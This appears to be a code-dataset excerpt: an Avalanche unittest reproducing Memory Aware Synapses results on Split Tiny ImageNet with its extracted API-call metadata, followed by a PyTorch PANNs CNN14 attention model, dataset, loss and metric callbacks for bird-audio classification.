replicaTables replicaCond snpTables snpCond snpStat nreplicas binSize binShift scenDir scenSfx sfx'\n )\n", (22492, 22618), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n')] |
import unittest
import torch
from torch.nn import CrossEntropyLoss
from torch.optim import SGD
from avalanche.evaluation.metrics import (
accuracy_metrics,
forgetting_metrics,
loss_metrics
)
from avalanche.training.plugins import EvaluationPlugin
from models import MultiHeadVGGSmall
from strategies.utils import create_default_args, get_average_metric
from strategies.utils import get_target_result, set_seed
import avalanche as avl
class MAS(unittest.TestCase):
    """
    Reproducing Memory Aware Synapses experiments from paper
    "A continual learning survey: Defying forgetting in classification tasks"
    by De Lange et al.
    https://doi.org/10.1109/TPAMI.2021.3057446
    """

    def test_stinyimagenet(self, override_args=None):
        """Split Tiny ImageNet benchmark"""
        args = create_default_args(
            {'cuda': 0, 'lambda_reg': 2., 'alpha': 0.5,
             'verbose': True, 'learning_rate': 0.005,
             'train_mb_size': 200, 'epochs': 70, 'seed': 0,
             'dataset_root': None}, override_args)
        set_seed(args.seed)
        use_cuda = torch.cuda.is_available() and args.cuda >= 0
        device = torch.device(f"cuda:{args.cuda}" if use_cuda else "cpu")
        # The paper assigns 20 randomly chosen classes to each of 10
        # consecutive tasks (task-incremental, oracle task id at test time),
        # so all tasks are roughly similar in difficulty, size and
        # distribution.
        scenario = avl.benchmarks.SplitTinyImageNet(
            10, return_task_id=True, dataset_root=args.dataset_root)
        model = MultiHeadVGGSmall(n_classes=20)
        criterion = CrossEntropyLoss()
        logger = avl.logging.InteractiveLogger()
        eval_plugin = EvaluationPlugin(
            accuracy_metrics(epoch=True, experience=True, stream=True),
            loss_metrics(epoch=True, experience=True, stream=True),
            forgetting_metrics(experience=True, stream=True),
            loggers=[logger], benchmark=scenario)
        strategy = avl.training.MAS(
            model,
            SGD(model.parameters(), lr=args.learning_rate, momentum=0.9),
            criterion, lambda_reg=args.lambda_reg, alpha=args.alpha,
            verbose=args.verbose, train_mb_size=args.train_mb_size,
            train_epochs=args.epochs, eval_mb_size=128, device=device,
            evaluator=eval_plugin)

        results = None
        for experience in scenario.train_stream:
            strategy.train(experience)
            results = strategy.eval(scenario.test_stream)
        if results is None:
            raise Exception("No results found")

        stream_acc = get_average_metric(results)
        print("MAS-SplitTinyImageNet Average "
              f"Stream Accuracy: {stream_acc:.2f}")
        # Recover the reference accuracy from the stored CSV.
        target = get_target_result('mas', 'stiny-imagenet')
        target_acc = float(target[0] if isinstance(target, list) else target)
        print(f"The target value was {target_acc:.2f}")
        # Only assert closeness when checking is enabled and we fell short.
        if args.check and target_acc > stream_acc:
            self.assertAlmostEqual(target_acc, stream_acc, delta=0.03)
| [
"avalanche.evaluation.metrics.accuracy_metrics",
"avalanche.evaluation.metrics.forgetting_metrics",
"torch.nn.CrossEntropyLoss",
"models.MultiHeadVGGSmall",
"avalanche.logging.InteractiveLogger",
"avalanche.evaluation.metrics.loss_metrics",
"strategies.utils.create_default_args",
"avalanche.benchmarks... | [((819, 1017), 'strategies.utils.create_default_args', 'create_default_args', (["{'cuda': 0, 'lambda_reg': 2.0, 'alpha': 0.5, 'verbose': True,\n 'learning_rate': 0.005, 'train_mb_size': 200, 'epochs': 70, 'seed': 0,\n 'dataset_root': None}", 'override_args'], {}), "({'cuda': 0, 'lambda_reg': 2.0, 'alpha': 0.5, 'verbose':\n True, 'learning_rate': 0.005, 'train_mb_size': 200, 'epochs': 70,\n 'seed': 0, 'dataset_root': None}, override_args)\n", (838, 1017), False, 'from strategies.utils import create_default_args, get_average_metric\n'), ((1069, 1088), 'strategies.utils.set_seed', 'set_seed', (['args.seed'], {}), '(args.seed)\n', (1077, 1088), False, 'from strategies.utils import get_target_result, set_seed\n'), ((1735, 1829), 'avalanche.benchmarks.SplitTinyImageNet', 'avl.benchmarks.SplitTinyImageNet', (['(10)'], {'return_task_id': '(True)', 'dataset_root': 'args.dataset_root'}), '(10, return_task_id=True, dataset_root=args\n .dataset_root)\n', (1767, 1829), True, 'import avalanche as avl\n'), ((1854, 1885), 'models.MultiHeadVGGSmall', 'MultiHeadVGGSmall', ([], {'n_classes': '(20)'}), '(n_classes=20)\n', (1871, 1885), False, 'from models import MultiHeadVGGSmall\n'), ((1906, 1924), 'torch.nn.CrossEntropyLoss', 'CrossEntropyLoss', ([], {}), '()\n', (1922, 1924), False, 'from torch.nn import CrossEntropyLoss\n'), ((1955, 1986), 'avalanche.logging.InteractiveLogger', 'avl.logging.InteractiveLogger', ([], {}), '()\n', (1984, 1986), True, 'import avalanche as avl\n'), ((3041, 3064), 'strategies.utils.get_average_metric', 'get_average_metric', (['res'], {}), '(res)\n', (3059, 3064), False, 'from strategies.utils import create_default_args, get_average_metric\n'), ((3220, 3262), 'strategies.utils.get_target_result', 'get_target_result', (['"""mas"""', '"""stiny-imagenet"""'], {}), "('mas', 'stiny-imagenet')\n", (3237, 3262), False, 'from strategies.utils import get_target_result, set_seed\n'), ((2046, 2104), 
'avalanche.evaluation.metrics.accuracy_metrics', 'accuracy_metrics', ([], {'epoch': '(True)', 'experience': '(True)', 'stream': '(True)'}), '(epoch=True, experience=True, stream=True)\n', (2062, 2104), False, 'from avalanche.evaluation.metrics import accuracy_metrics, forgetting_metrics, loss_metrics\n'), ((2148, 2202), 'avalanche.evaluation.metrics.loss_metrics', 'loss_metrics', ([], {'epoch': '(True)', 'experience': '(True)', 'stream': '(True)'}), '(epoch=True, experience=True, stream=True)\n', (2160, 2202), False, 'from avalanche.evaluation.metrics import accuracy_metrics, forgetting_metrics, loss_metrics\n'), ((2246, 2294), 'avalanche.evaluation.metrics.forgetting_metrics', 'forgetting_metrics', ([], {'experience': '(True)', 'stream': '(True)'}), '(experience=True, stream=True)\n', (2264, 2294), False, 'from avalanche.evaluation.metrics import accuracy_metrics, forgetting_metrics, loss_metrics\n'), ((1172, 1197), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1195, 1197), False, 'import torch\n')] |
import logging
import os
import random
import time
import warnings
from collections import OrderedDict
from contextlib import contextmanager
from pathlib import Path
from typing import List, Optional
import cv2
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.utils.data as data
from IPython.display import Audio
from sklearn.metrics import average_precision_score, f1_score
from sklearn.model_selection import StratifiedKFold
import librosa
import librosa.display as display
import soundfile as sf
import utils
from catalyst.dl import Callback, CallbackOrder, State
class DFTBase(nn.Module):
    """Base class providing forward/inverse DFT matrix construction."""

    def __init__(self):
        super(DFTBase, self).__init__()

    def dft_matrix(self, n):
        """Return the n x n DFT matrix W[x, y] = exp(-2*pi*i*x*y / n)."""
        grid_x, grid_y = np.meshgrid(np.arange(n), np.arange(n))
        root = np.exp(-2 * np.pi * 1j / n)
        return np.power(root, grid_x * grid_y)

    def idft_matrix(self, n):
        """Return the n x n inverse-DFT matrix (without the 1/n factor)."""
        grid_x, grid_y = np.meshgrid(np.arange(n), np.arange(n))
        root = np.exp(2 * np.pi * 1j / n)
        return np.power(root, grid_x * grid_y)
class STFT(DFTBase):
    """STFT implemented as two fixed Conv1d layers (real and imaginary parts).

    The windowed DFT basis is baked into the conv weights so the transform
    matches ``librosa.core.stft`` while running on any torch device.
    """
    def __init__(
        self,
        n_fft=2048,
        hop_length=None,
        win_length=None,
        window="hann",
        center=True,
        pad_mode="reflect",
        freeze_parameters=True,
    ):
        """Implementation of STFT with Conv1d. The function has the same output
        of librosa.core.stft

        Args:
            n_fft: FFT size (also the conv kernel size).
            hop_length: stride between frames; defaults to win_length // 4.
            win_length: analysis window length; defaults to n_fft.
            window: window name passed to librosa.filters.get_window.
            center: if True, pad the input by n_fft // 2 on both sides so
                frames are centered on their timestamps.
            pad_mode: "constant" or "reflect" (the only modes allowed).
            freeze_parameters: if True, the DFT conv weights are frozen.
        """
        super(STFT, self).__init__()
        assert pad_mode in ["constant", "reflect"]
        self.n_fft = n_fft
        self.center = center
        self.pad_mode = pad_mode
        # By default, use the entire frame
        if win_length is None:
            win_length = n_fft
        # Set the default hop, if it's not already specified
        if hop_length is None:
            hop_length = int(win_length // 4)
        fft_window = librosa.filters.get_window(window, win_length, fftbins=True)
        # Pad the window out to n_fft size
        fft_window = librosa.util.pad_center(fft_window, n_fft)
        # DFT & IDFT matrix
        self.W = self.dft_matrix(n_fft)
        # Keep only the non-negative frequency bins (real-valued input).
        out_channels = n_fft // 2 + 1
        self.conv_real = nn.Conv1d(
            in_channels=1,
            out_channels=out_channels,
            kernel_size=n_fft,
            stride=hop_length,
            padding=0,
            dilation=1,
            groups=1,
            bias=False,
        )
        self.conv_imag = nn.Conv1d(
            in_channels=1,
            out_channels=out_channels,
            kernel_size=n_fft,
            stride=hop_length,
            padding=0,
            dilation=1,
            groups=1,
            bias=False,
        )
        # Bake the windowed DFT basis into the conv weights: each output
        # channel correlates the input frame with one frequency's basis row.
        self.conv_real.weight.data = torch.Tensor(
            np.real(self.W[:, 0:out_channels] * fft_window[:, None]).T
        )[:, None, :]
        # (n_fft // 2 + 1, 1, n_fft)
        self.conv_imag.weight.data = torch.Tensor(
            np.imag(self.W[:, 0:out_channels] * fft_window[:, None]).T
        )[:, None, :]
        # (n_fft // 2 + 1, 1, n_fft)
        if freeze_parameters:
            for param in self.parameters():
                param.requires_grad = False
    def forward(self, input):
        """input: (batch_size, data_length)
        Returns:
            real: (batch_size, 1, time_steps, n_fft // 2 + 1)
            imag: (batch_size, 1, time_steps, n_fft // 2 + 1)
        """
        x = input[:, None, :]  # (batch_size, channels_num, data_length)
        if self.center:
            x = F.pad(x, pad=(self.n_fft // 2, self.n_fft // 2), mode=self.pad_mode)
        real = self.conv_real(x)
        imag = self.conv_imag(x)
        # (batch_size, n_fft // 2 + 1, time_steps)
        real = real[:, None, :, :].transpose(2, 3)
        imag = imag[:, None, :, :].transpose(2, 3)
        # (batch_size, 1, time_steps, n_fft // 2 + 1)
        return real, imag
class Spectrogram(nn.Module):
    """(Power) spectrogram computed via the Conv1d-based STFT.

    Produces |STFT|**power: power=2.0 (default) yields the power spectrogram,
    power=1.0 the magnitude spectrogram.
    """

    def __init__(
        self,
        n_fft=2048,
        hop_length=None,
        win_length=None,
        window="hann",
        center=True,
        pad_mode="reflect",
        power=2.0,
        freeze_parameters=True,
    ):
        """Calculate spectrogram using pytorch. The STFT is implemented with
        Conv1d. The function has the same output of librosa.core.stft

        Args:
            power: exponent applied to the magnitude spectrogram.
            (remaining arguments are forwarded to STFT)
        """
        super(Spectrogram, self).__init__()
        self.power = power
        self.stft = STFT(
            n_fft=n_fft,
            hop_length=hop_length,
            win_length=win_length,
            window=window,
            center=center,
            pad_mode=pad_mode,
            freeze_parameters=True,
        )

    def forward(self, input):
        """input: (batch_size, data_length) raw waveform.
        Returns:
            spectrogram: (batch_size, 1, time_steps, n_fft // 2 + 1)
        """
        (real, imag) = self.stft.forward(input)
        # (batch_size, 1, time_steps, n_fft // 2 + 1)
        spectrogram = real ** 2 + imag ** 2
        if self.power != 2.0:
            # Bug fix: the original referenced the undefined bare name
            # `power` here (NameError at runtime); the exponent is stored
            # on self.power.
            spectrogram = spectrogram ** (self.power / 2.0)
        return spectrogram
class LogmelFilterBank(nn.Module):
    """Mel (optionally log-mel) projection of a power spectrogram.

    The mel filter bank replicates ``librosa.filters.mel`` and is stored as
    a (frozen by default) nn.Parameter so the projection runs on any device.
    """

    def __init__(
        self,
        sr=32000,
        n_fft=2048,
        n_mels=64,
        fmin=50,
        fmax=14000,
        is_log=True,
        ref=1.0,
        amin=1e-10,
        top_db=80.0,
        freeze_parameters=True,
    ):
        """Calculate logmel spectrogram using pytorch. The mel filter bank is
        the pytorch implementation of as librosa.filters.mel

        Args:
            sr: sample rate of the source audio.
            n_fft: FFT size (input has n_fft // 2 + 1 frequency bins).
            n_mels: number of mel bands.
            fmin / fmax: filter bank frequency range in Hz.
            is_log: if True, convert power to decibels in forward().
            ref / amin / top_db: dB-conversion parameters as in
                librosa.power_to_db; top_db may be None to skip clipping.
            freeze_parameters: if True, the filter bank is not trainable.
        """
        super(LogmelFilterBank, self).__init__()
        self.is_log = is_log
        self.ref = ref
        self.amin = amin
        self.top_db = top_db
        self.melW = librosa.filters.mel(
            sr=sr, n_fft=n_fft, n_mels=n_mels, fmin=fmin, fmax=fmax
        ).T
        # (n_fft // 2 + 1, mel_bins)
        self.melW = nn.Parameter(torch.Tensor(self.melW))
        if freeze_parameters:
            for param in self.parameters():
                param.requires_grad = False

    def forward(self, input):
        """input: (..., time_steps, n_fft // 2 + 1) power spectrogram
        Output: (..., time_steps, mel_bins)
        """
        # Mel spectrogram: project frequency bins onto mel bands.
        mel_spectrogram = torch.matmul(input, self.melW)
        # Logmel spectrogram
        if self.is_log:
            return self.power_to_db(mel_spectrogram)
        return mel_spectrogram

    def power_to_db(self, input):
        """Power to db; pytorch port of librosa.core.power_to_db.

        Raises:
            ValueError: if top_db is negative.
        """
        ref_value = self.ref
        log_spec = 10.0 * torch.log10(torch.clamp(input, min=self.amin, max=np.inf))
        log_spec -= 10.0 * np.log10(np.maximum(self.amin, ref_value))
        if self.top_db is not None:
            if self.top_db < 0:
                # Bug fix: ParameterError is not defined/imported in this
                # file, so this path previously crashed with a NameError.
                raise ValueError("top_db must be non-negative")
            log_spec = torch.clamp(
                log_spec, min=log_spec.max().item() - self.top_db, max=np.inf
            )
        return log_spec
class DropStripes(nn.Module):
    """Zero out random stripes along one axis (SpecAugment building block).

    Args:
        dim: 2 to drop along time, 3 to drop along frequency
        drop_width: maximum width of each dropped stripe
        stripes_num: number of stripes to drop per example
    """

    def __init__(self, dim, drop_width, stripes_num):
        super(DropStripes, self).__init__()
        assert dim in [2, 3]  # dim 2: time; dim 3: frequency
        self.dim = dim
        self.drop_width = drop_width
        self.stripes_num = stripes_num

    def forward(self, input):
        """input: (batch_size, channels, time_steps, freq_bins)"""
        assert input.ndimension() == 4
        # No-op in eval mode; in training mode, mutate each sample in place.
        if self.training is False:
            return input
        width = input.shape[self.dim]
        for sample in input:
            self.transform_slice(sample, width)
        return input

    def transform_slice(self, e, total_width):
        """e: (channels, time_steps, freq_bins) — zeroed stripes in place."""
        for _ in range(self.stripes_num):
            distance = torch.randint(low=0, high=self.drop_width, size=(1,))[0]
            bgn = torch.randint(low=0, high=total_width - distance, size=(1,))[0]
            if self.dim == 2:
                e[:, bgn : bgn + distance, :] = 0
            else:
                e[:, :, bgn : bgn + distance] = 0
class SpecAugmentation(nn.Module):
    """SpecAugment-style masking: random time stripes then frequency stripes.

    [ref] Park et al., 2019. Specaugment: A simple data augmentation method
    for automatic speech recognition. arXiv preprint arXiv:1904.08779.

    Args:
        time_drop_width: max width of each time stripe
        time_stripes_num: number of time stripes
        freq_drop_width: max width of each frequency stripe
        freq_stripes_num: number of frequency stripes
    """

    def __init__(
        self, time_drop_width, time_stripes_num, freq_drop_width, freq_stripes_num
    ):
        super(SpecAugmentation, self).__init__()
        self.time_dropper = DropStripes(
            dim=2, drop_width=time_drop_width, stripes_num=time_stripes_num
        )
        self.freq_dropper = DropStripes(
            dim=3, drop_width=freq_drop_width, stripes_num=freq_stripes_num
        )

    def forward(self, input):
        # Apply time masking first, then frequency masking.
        return self.freq_dropper(self.time_dropper(input))
def init_layer(layer):
    """Xavier-initialize a layer's weight and zero its bias (if present)."""
    nn.init.xavier_uniform_(layer.weight)
    bias = getattr(layer, "bias", None)
    if bias is not None:
        bias.data.fill_(0.0)
def init_bn(bn):
    """Reset a batch-norm layer to the identity affine (weight 1, bias 0)."""
    bn.weight.data.fill_(1.0)
    bn.bias.data.fill_(0.0)
def do_mixup(x, mixup_lambda):
    """Mixup x of even indexes (0, 2, 4, ...) with x of odd indexes
    (1, 3, 5, ...).

    Args:
        x: (batch_size * 2, ...)
        mixup_lambda: (batch_size * 2,)

    Returns:
        out: (batch_size, ...)
    """
    # Transposing moves the batch axis last so the per-sample lambdas
    # broadcast cleanly; transpose back afterwards.
    evens = x[0::2].transpose(0, -1) * mixup_lambda[0::2]
    odds = x[1::2].transpose(0, -1) * mixup_lambda[1::2]
    return (evens + odds).transpose(0, -1)
def interpolate(x: torch.Tensor, ratio: int):
    """Repeat each time step `ratio` times, compensating the resolution
    reduction caused by CNN downsampling.

    Args:
        x: (batch_size, time_steps, classes_num)
        ratio: int, upsampling factor

    Returns:
        upsampled: (batch_size, time_steps * ratio, classes_num)
    """
    batch_size, time_steps, classes_num = x.shape
    # Insert a repeat axis next to time, then flatten it back into time.
    repeated = x[:, :, None, :].repeat(1, 1, ratio, 1)
    return repeated.reshape(batch_size, time_steps * ratio, classes_num)
def pad_framewise_output(framewise_output: torch.Tensor, frames_num: int):
    """Pad framewise_output along time to `frames_num` frames by repeating
    the value of its last frame.

    Args:
        framewise_output: (batch_size, n, classes_num) with n <= frames_num
        frames_num: int, target number of frames

    Returns:
        output: (batch_size, frames_num, classes_num)
    """
    missing = frames_num - framewise_output.shape[1]
    # Tile the final frame to fill the missing tail, then append it.
    tail = framewise_output[:, -1:, :].repeat(1, missing, 1)
    return torch.cat((framewise_output, tail), dim=1)
class ConvBlock(nn.Module):
    """Two 3x3 conv + BN + ReLU layers followed by a configurable pooling.

    Args:
        in_channels: channels of the input feature map
        out_channels: channels produced by both convolutions
    """

    def __init__(self, in_channels: int, out_channels: int):
        super().__init__()
        self.conv1 = nn.Conv2d(
            in_channels=in_channels,
            out_channels=out_channels,
            kernel_size=(3, 3),
            stride=(1, 1),
            padding=(1, 1),
            bias=False,
        )
        self.conv2 = nn.Conv2d(
            in_channels=out_channels,
            out_channels=out_channels,
            kernel_size=(3, 3),
            stride=(1, 1),
            padding=(1, 1),
            bias=False,
        )
        self.bn1 = nn.BatchNorm2d(out_channels)
        self.bn2 = nn.BatchNorm2d(out_channels)
        self.init_weight()

    def init_weight(self):
        """Xavier weights for the convs, identity affine for the BN layers."""
        init_layer(self.conv1)
        init_layer(self.conv2)
        init_bn(self.bn1)
        init_bn(self.bn2)

    def forward(self, input, pool_size=(2, 2), pool_type="avg"):
        """Apply conv-bn-relu twice, then pool.

        Args:
            input: (batch, in_channels, time, freq)
            pool_size: pooling kernel size
            pool_type: one of "max", "avg", "avg+max"

        Raises:
            ValueError: if pool_type is not one of the supported modes.
        """
        x = F.relu_(self.bn1(self.conv1(input)))
        x = F.relu_(self.bn2(self.conv2(x)))
        if pool_type == "max":
            return F.max_pool2d(x, kernel_size=pool_size)
        if pool_type == "avg":
            return F.avg_pool2d(x, kernel_size=pool_size)
        if pool_type == "avg+max":
            return (F.avg_pool2d(x, kernel_size=pool_size)
                    + F.max_pool2d(x, kernel_size=pool_size))
        # Fix: raise a specific exception type instead of a bare Exception
        # (ValueError is still caught by callers handling Exception).
        raise ValueError("Incorrect argument!")
class AttBlock(nn.Module):
    """Attention pooling head: softmax attention over time weighting a
    parallel per-frame classifier, pooled to a clipwise prediction.
    """

    def __init__(
        self, in_features: int, out_features: int, activation="linear", temperature=1.0
    ):
        super().__init__()
        self.activation = activation
        self.temperature = temperature
        conv_kwargs = dict(
            in_channels=in_features,
            out_channels=out_features,
            kernel_size=1,
            stride=1,
            padding=0,
            bias=True,
        )
        self.att = nn.Conv1d(**conv_kwargs)
        self.cla = nn.Conv1d(**conv_kwargs)
        self.bn_att = nn.BatchNorm1d(out_features)
        self.init_weights()

    def init_weights(self):
        init_layer(self.att)
        init_layer(self.cla)
        init_bn(self.bn_att)

    def forward(self, x):
        # x: (n_samples, n_in, n_time)
        # Clamp the attention logits to keep the softmax numerically stable.
        norm_att = torch.softmax(torch.clamp(self.att(x), -10, 10), dim=-1)
        cla = self.nonlinear_transform(self.cla(x))
        pooled = torch.sum(norm_att * cla, dim=2)
        return pooled, norm_att, cla

    def nonlinear_transform(self, x):
        if self.activation == "sigmoid":
            return torch.sigmoid(x)
        if self.activation == "linear":
            return x
class PANNsCNN14Att(nn.Module):
    """CNN14 feature backbone with an attention pooling head.

    Takes raw waveforms, extracts (augmented) log-mel features, runs six
    ConvBlocks, and produces both clipwise and framewise predictions.
    """
    def __init__(
        self,
        sample_rate: int,
        window_size: int,
        hop_size: int,
        mel_bins: int,
        fmin: int,
        fmax: int,
        classes_num: int,
    ):
        super().__init__()
        # Fixed STFT / log-mel settings for the feature extractors below.
        window = "hann"
        center = True
        pad_mode = "reflect"
        ref = 1.0
        amin = 1e-10
        top_db = None
        self.interpolate_ratio = 32  # Downsampled ratio
        # Spectrogram extractor
        self.spectrogram_extractor = Spectrogram(
            n_fft=window_size,
            hop_length=hop_size,
            win_length=window_size,
            window=window,
            center=center,
            pad_mode=pad_mode,
            freeze_parameters=True,
        )
        # Logmel feature extractor
        self.logmel_extractor = LogmelFilterBank(
            sr=sample_rate,
            n_fft=window_size,
            n_mels=mel_bins,
            fmin=fmin,
            fmax=fmax,
            ref=ref,
            amin=amin,
            top_db=top_db,
            freeze_parameters=True,
        )
        # Spec augmenter
        self.spec_augmenter = SpecAugmentation(
            time_drop_width=64,
            time_stripes_num=2,
            freq_drop_width=8,
            freq_stripes_num=2,
        )
        self.bn0 = nn.BatchNorm2d(mel_bins)
        # Six conv blocks doubling channels: 1 -> 64 -> ... -> 2048.
        self.conv_block1 = ConvBlock(in_channels=1, out_channels=64)
        self.conv_block2 = ConvBlock(in_channels=64, out_channels=128)
        self.conv_block3 = ConvBlock(in_channels=128, out_channels=256)
        self.conv_block4 = ConvBlock(in_channels=256, out_channels=512)
        self.conv_block5 = ConvBlock(in_channels=512, out_channels=1024)
        self.conv_block6 = ConvBlock(in_channels=1024, out_channels=2048)
        self.fc1 = nn.Linear(2048, 2048, bias=True)
        self.att_block = AttBlock(2048, classes_num, activation="sigmoid")
        self.init_weight()
    def init_weight(self):
        # Identity batch-norm affine; Xavier-initialized fc layer.
        init_bn(self.bn0)
        init_layer(self.fc1)
    def cnn_feature_extractor(self, x):
        """Run the six ConvBlocks with avg pooling and dropout 0.2 between."""
        x = self.conv_block1(x, pool_size=(2, 2), pool_type="avg")
        x = F.dropout(x, p=0.2, training=self.training)
        x = self.conv_block2(x, pool_size=(2, 2), pool_type="avg")
        x = F.dropout(x, p=0.2, training=self.training)
        x = self.conv_block3(x, pool_size=(2, 2), pool_type="avg")
        x = F.dropout(x, p=0.2, training=self.training)
        x = self.conv_block4(x, pool_size=(2, 2), pool_type="avg")
        x = F.dropout(x, p=0.2, training=self.training)
        x = self.conv_block5(x, pool_size=(2, 2), pool_type="avg")
        x = F.dropout(x, p=0.2, training=self.training)
        x = self.conv_block6(x, pool_size=(1, 1), pool_type="avg")
        x = F.dropout(x, p=0.2, training=self.training)
        return x
    def preprocess(self, input, mixup_lambda=None):
        """Waveform -> (batch-normalized log-mel features, frame count).

        SpecAugment and mixup are only applied in training mode.
        """
        # t1 = time.time()
        x = self.spectrogram_extractor(input)  # (batch_size, 1, time_steps, freq_bins)
        x = self.logmel_extractor(x)  # (batch_size, 1, time_steps, mel_bins)
        frames_num = x.shape[2]
        # BatchNorm over the mel axis: swap it into channel position first.
        x = x.transpose(1, 3)
        x = self.bn0(x)
        x = x.transpose(1, 3)
        if self.training:
            x = self.spec_augmenter(x)
        # Mixup on spectrogram
        if self.training and mixup_lambda is not None:
            x = do_mixup(x, mixup_lambda)
        return x, frames_num
    def forward(self, input, mixup_lambda=None):
        """
        Input: (batch_size, data_length) raw waveform.
        Returns a dict with "framewise_output" and "clipwise_output"."""
        x, frames_num = self.preprocess(input, mixup_lambda=mixup_lambda)
        # Output shape (batch size, channels, time, frequency)
        x = self.cnn_feature_extractor(x)
        # Aggregate in frequency axis
        x = torch.mean(x, dim=3)
        # Smooth along time via parallel max + avg pooling.
        x1 = F.max_pool1d(x, kernel_size=3, stride=1, padding=1)
        x2 = F.avg_pool1d(x, kernel_size=3, stride=1, padding=1)
        x = x1 + x2
        x = F.dropout(x, p=0.5, training=self.training)
        x = x.transpose(1, 2)
        x = F.relu_(self.fc1(x))
        x = x.transpose(1, 2)
        x = F.dropout(x, p=0.5, training=self.training)
        (clipwise_output, norm_att, segmentwise_output) = self.att_block(x)
        segmentwise_output = segmentwise_output.transpose(1, 2)
        # Get framewise output: upsample segment predictions back to input
        # frame resolution and pad the tail with the last frame's value.
        framewise_output = interpolate(segmentwise_output, self.interpolate_ratio)
        framewise_output = pad_framewise_output(framewise_output, frames_num)
        output_dict = {
            "framewise_output": framewise_output,
            "clipwise_output": clipwise_output,
        }
        return output_dict
class PANNsDataset(data.Dataset):
    """Dataset yielding fixed-length waveform crops plus one-hot bird labels.

    Waveforms are loaded from pre-resampled .npy files laid out as
    ``datadir / ebird_code / <filename with .npy extension>``.
    """

    def __init__(
        self, df, datadir, waveform_transforms=None, period=5, sample_rate=32000
    ):
        self.df = df
        self.datadir = datadir
        self.waveform_transforms = waveform_transforms
        self.period = period
        self.sample_rate = sample_rate

    def __len__(self):
        return len(self.df)

    def __getitem__(self, idx: int):
        sample = self.df.iloc[idx, :]
        # Source metadata lists mp3/wav names; the stored arrays are .npy.
        wav_name = sample["filename"].replace("mp3", "npy").replace("wav", "npy")
        ebird_code = sample["ebird_code"]
        duration = sample["duration"]  # read for parity; unused below
        wav_path = self.datadir / ebird_code / wav_name
        effective_length = self.sample_rate * self.period
        y = np.load(wav_path)
        if self.waveform_transforms:
            y = self.waveform_transforms(y)
        else:
            # No transform: crop or pad to exactly `period` seconds, placing
            # the clip at a random offset.
            len_y = len(y)
            if len_y < effective_length:
                padded = np.zeros(effective_length, dtype=y.dtype)
                offset = np.random.randint(effective_length - len_y)
                padded[offset : offset + len_y] = y
                y = padded.astype(np.float32)
            elif len_y > effective_length:
                offset = np.random.randint(len_y - effective_length)
                y = y[offset : offset + effective_length].astype(np.float32)
            else:
                y = y.astype(np.float32)
        labels = np.zeros(len(utils.BIRD_CODE), dtype="f")
        labels[utils.BIRD_CODE[ebird_code]] = 1
        return {"waveform": y, "targets": labels}
class PANNsLoss(nn.Module):
    """Binary cross-entropy on the clipwise output, with non-finite
    predictions replaced by zero so the loss stays defined.
    """

    def __init__(self):
        super().__init__()
        self.bce = nn.BCELoss()

    def forward(self, input, target):
        pred = input["clipwise_output"]
        zeros = torch.zeros_like(pred)
        # Sanitize: NaN/Inf predictions become 0 before the BCE.
        pred = torch.where(torch.isnan(pred), zeros, pred)
        pred = torch.where(torch.isinf(pred), zeros, pred)
        return self.bce(pred, target.float())
class F1Callback(Callback):
    """Catalyst callback tracking macro-F1 per batch and per loader epoch."""

    def __init__(
        self,
        input_key: str = "targets",
        output_key: str = "logits",
        model_output_key: str = "clipwise_output",
        prefix: str = "f1",
    ):
        super().__init__(CallbackOrder.Metric)
        self.input_key = input_key
        self.output_key = output_key
        self.model_output_key = model_output_key
        self.prefix = prefix

    def on_loader_start(self, state: State):
        # Accumulated over the loader for the epoch-level score.
        self.prediction: List[np.ndarray] = []
        self.target: List[np.ndarray] = []

    def on_batch_end(self, state: State):
        targ = state.input[self.input_key].detach().cpu().numpy()
        clipwise_output = (
            state.output[self.output_key][self.model_output_key]
            .detach().cpu().numpy()
        )
        self.prediction.append(clipwise_output)
        self.target.append(targ)
        state.batch_metrics[self.prefix] = f1_score(
            targ.argmax(axis=1), clipwise_output.argmax(axis=1), average="macro"
        )

    def on_loader_end(self, state: State):
        y_pred = np.concatenate(self.prediction, axis=0).argmax(axis=1)
        y_true = np.concatenate(self.target, axis=0).argmax(axis=1)
        score = f1_score(y_true, y_pred, average="macro")
        state.loader_metrics[self.prefix] = score
        key = (
            state.valid_loader + "_epoch_" + self.prefix
            if state.is_valid_loader
            else "train_epoch_" + self.prefix
        )
        state.epoch_metrics[key] = score
class mAPCallback(Callback):
    """Catalyst callback tracking mean average precision (NaN classes -> 0)."""

    def __init__(
        self,
        input_key: str = "targets",
        output_key: str = "logits",
        model_output_key: str = "clipwise_output",
        prefix: str = "mAP",
    ):
        super().__init__(CallbackOrder.Metric)
        self.input_key = input_key
        self.output_key = output_key
        self.model_output_key = model_output_key
        self.prefix = prefix

    def on_loader_start(self, state: State):
        # Accumulated over the loader for the epoch-level score.
        self.prediction: List[np.ndarray] = []
        self.target: List[np.ndarray] = []

    def on_batch_end(self, state: State):
        targ = state.input[self.input_key].detach().cpu().numpy()
        clipwise_output = (
            state.output[self.output_key][self.model_output_key]
            .detach().cpu().numpy()
        )
        self.prediction.append(clipwise_output)
        self.target.append(targ)
        per_class = average_precision_score(targ, clipwise_output, average=None)
        # Classes absent from the batch produce NaN AP; count them as 0.
        state.batch_metrics[self.prefix] = np.nan_to_num(per_class).mean()

    def on_loader_end(self, state: State):
        y_pred = np.concatenate(self.prediction, axis=0)
        y_true = np.concatenate(self.target, axis=0)
        per_class = average_precision_score(y_true, y_pred, average=None)
        score = np.nan_to_num(per_class).mean()
        state.loader_metrics[self.prefix] = score
        key = (
            state.valid_loader + "_epoch_" + self.prefix
            if state.is_valid_loader
            else "train_epoch_" + self.prefix
        )
        state.epoch_metrics[key] = score
def get_model(config: dict, weights_path=None):
    """Build PANNsCNN14Att with a fresh 264-class attention head.

    Args:
        config: keyword arguments forwarded to PANNsCNN14Att.
        weights_path: optional checkpoint path; when given, the state dict
            is loaded after stripping any DataParallel "module." prefix,
            otherwise the new attention head is (re-)initialized.
    """
    model = PANNsCNN14Att(**config)
    model.att_block = AttBlock(2048, 264, activation="sigmoid")
    if not weights_path:
        model.att_block.init_weights()
        return model
    checkpoint = torch.load(weights_path)
    cleaned = OrderedDict(
        (key[7:] if key[:7] == "module." else key, value)
        for key, value in checkpoint["model_state_dict"].items()
    )
    model.load_state_dict(cleaned)
    return model
| [
